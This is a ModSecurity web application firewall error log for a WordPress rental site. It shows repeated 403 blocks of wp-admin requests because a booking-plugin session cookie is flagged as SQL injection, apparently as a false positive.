[Mon May 11 22:24:55.057481 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI7F3o_DFxNSZVmaX3PPwAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:55.057773 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI7F3o_DFxNSZVmaX3PPwAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:55.655480 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7F3o_DFxNSZVmaX3PPwAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:55.856990 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI7F3o_DFxNSZVmaX3PQgAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:55.857330 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI7F3o_DFxNSZVmaX3PQgAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:56.221559 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7F3o_DFxNSZVmaX3PQgAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:57.264668 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI7GXo_DFxNSZVmaX3PTAAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:57.264961 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI7GXo_DFxNSZVmaX3PTAAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:57.873314 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7GXo_DFxNSZVmaX3PTAAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:58.333859 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI7Gno_DFxNSZVmaX3PTgAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:58.334142 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI7Gno_DFxNSZVmaX3PTgAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:58.969977 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7Gno_DFxNSZVmaX3PTgAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:59.344750 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI7G3o_DFxNSZVmaX3PTwAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:59.345038 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI7G3o_DFxNSZVmaX3PTwAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:59.971937 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7G3o_DFxNSZVmaX3PTwAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:02.042090 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI7Hno_DFxNSZVmaX3PVAAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:02.042540 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI7Hno_DFxNSZVmaX3PVAAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:02.611930 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7Hno_DFxNSZVmaX3PVAAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:03.033494 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI7H3o_DFxNSZVmaX3PVQAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:03.033787 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI7H3o_DFxNSZVmaX3PVQAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:03.577929 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7H3o_DFxNSZVmaX3PVQAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:03.854560 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI7H3o_DFxNSZVmaX3PVgAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:03.854844 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI7H3o_DFxNSZVmaX3PVgAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:04.244789 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7H3o_DFxNSZVmaX3PVgAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:04.842120 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI7IHo_DFxNSZVmaX3PVwAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:04.842420 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI7IHo_DFxNSZVmaX3PVwAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:05.431542 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7IHo_DFxNSZVmaX3PVwAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:05.930034 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI7IXo_DFxNSZVmaX3PXAAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:05.930336 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI7IXo_DFxNSZVmaX3PXAAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:06.562401 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7IXo_DFxNSZVmaX3PXAAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:06.951189 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI7Ino_DFxNSZVmaX3PXwAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:06.951483 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI7Ino_DFxNSZVmaX3PXwAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:07.544869 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7Ino_DFxNSZVmaX3PXwAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:08.050951 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI7JHo_DFxNSZVmaX3PYAAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:08.051266 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI7JHo_DFxNSZVmaX3PYAAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:25:08.590049 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7JHo_DFxNSZVmaX3PYAAAANA"], referer: https://rentparadise.fr/wp-login.php
